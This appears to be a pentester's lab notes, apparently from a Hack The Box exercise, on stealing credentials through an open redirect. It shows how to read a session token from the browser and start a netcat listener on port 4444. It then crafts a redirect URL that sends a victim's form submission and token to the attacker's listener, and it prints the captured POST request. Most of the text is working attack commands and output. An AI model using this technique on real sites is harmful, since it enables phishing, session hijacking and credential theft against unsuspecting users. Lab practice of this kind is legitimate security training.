CREDENTIAL THEFT
#craft a malicious URL that appears to be from a legitimate website but redirects users to a phishing page.
#Users might think they’re logging into a real service, but their credentials get stolen
#walk the application
root@oco:~$ BROWSER > {targetSite:port}
...
* submit expected input and identify potential entry points
#open redirect vulnerability
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > siteCookieValues
Name: PHPSESSID (aka token)
Value: ntrgep8modbid35j2me2thjjjt
* if a token is included in the GET/POST Request, then it must be used as part of the request as it could be a session or anti-CSRF token and, therefore, useful to an attacker.
root@oco:~$ nc -nlvp 4444
root@oco:~$ BROWSER > {targetSite:port}/index.php?url={attackerNetcatListenerIP&Port}&token={tokenValue}
* the target must enter input into any form in order for this to work
- e.g., providing email address on the form, etc
root@oco:~$ nc...
listening on [any] 4444 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.14.35] 41650
POST / HTTP/1.1
Host: 10.10.14.35:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://oredirect.htb.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://oredirect.htb.net
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Priority: u=0, i
email=null%40null.com&recover-submit=Reset+Password&token=ntrgep8modbid35j2me2thjjjtLast updated